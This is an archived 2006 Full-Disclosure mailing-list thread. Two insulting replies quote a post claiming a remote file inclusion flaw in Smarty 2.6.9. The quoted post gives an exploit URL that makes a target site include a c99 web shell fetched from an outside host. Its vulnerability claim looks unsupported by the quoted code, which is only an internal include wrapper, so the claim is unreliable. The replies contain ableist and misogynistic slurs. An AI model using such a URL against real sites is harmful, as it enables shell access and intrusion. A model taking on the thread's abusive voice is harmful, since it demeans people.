[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] Vuln
- To: upb <upbupb@xxxxxxxxx>
- Subject: Re: [Full-disclosure] Vuln
- From: "Pink Hat" <pinkhat.h4x0r@xxxxxxxxx>
- Date: Sun, 15 Oct 2006 12:19:08 -0700
I didn't know those were mutually exclusive. Thats like asking your
mom is she is a slut or a whore. Aren't they one and the same?
On 10/15/06, upb <upbupb@xxxxxxxxx> wrote:
>
> are you fucking stupid or just retarded?
>
>
> On 10/14/06, hitham hitham <sp1der_net@xxxxxxxxxxx> wrote:
> >
> > Hi I find a new vuln ...
> >
> > the vuln :-
> >
> > #########################################################
> >
> > # Auother :- Sp1deR_NeT
> >
> > # E-mail :- Sp1deR_Net@xxxxxxxxxxx
> >
> > # Site's :- WWW.Pal-HackinG.Com ++ WwW.Sp1deR-N3t.Com
> >
> > # We Are :- Sp1deR_NeT , HACKERS PAL , MohajaLi .
> >
> > #########################################################
> >
> > Script :- Smarty-2.6.9
> >
> > Exploit :- libs/Smarty.class.php?filename= www.soqor.net/tools/c99.txt?
> >
> > Example :-
> >
> www.sitename.com/[path]/libs/Smarty.class.php?filename=www.soqor.net/tools/c99.txt
> ?
> >
> > Vuln Code :-
> > /**
> > * wrapper for include() retaining $this
> > * @return mixed
> > */
> > function _include($filename, $once=false, $params=null)
> > {
> > if ($once) {
> > return include_once($filename);
> > } else {
> > return include($filename);
> > }
> > }
> > ---------------------------------------------
> >
> > Thx To :- nET^ViRus,Dr.HackeR,RunViruS,MaFiaBoy,Mr.Hcr,KabaRa,LeCoprA.
> >
> > ---------------------------------------------
> >
> > WwW.Sp1deR-N3T.Com ///\\\///\\\
> >
> > =============Sp1deR_Net@xxxxxxxxxxx==============
> >
> > !@!@!@!@!@!
> >
> >
> _________________________________________________________________
> > Windows Live™ Messenger has arrived. Click here to download it for free!
> > http://imagine-msn.com/messenger/launch80/?locale=en-gb
> >
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/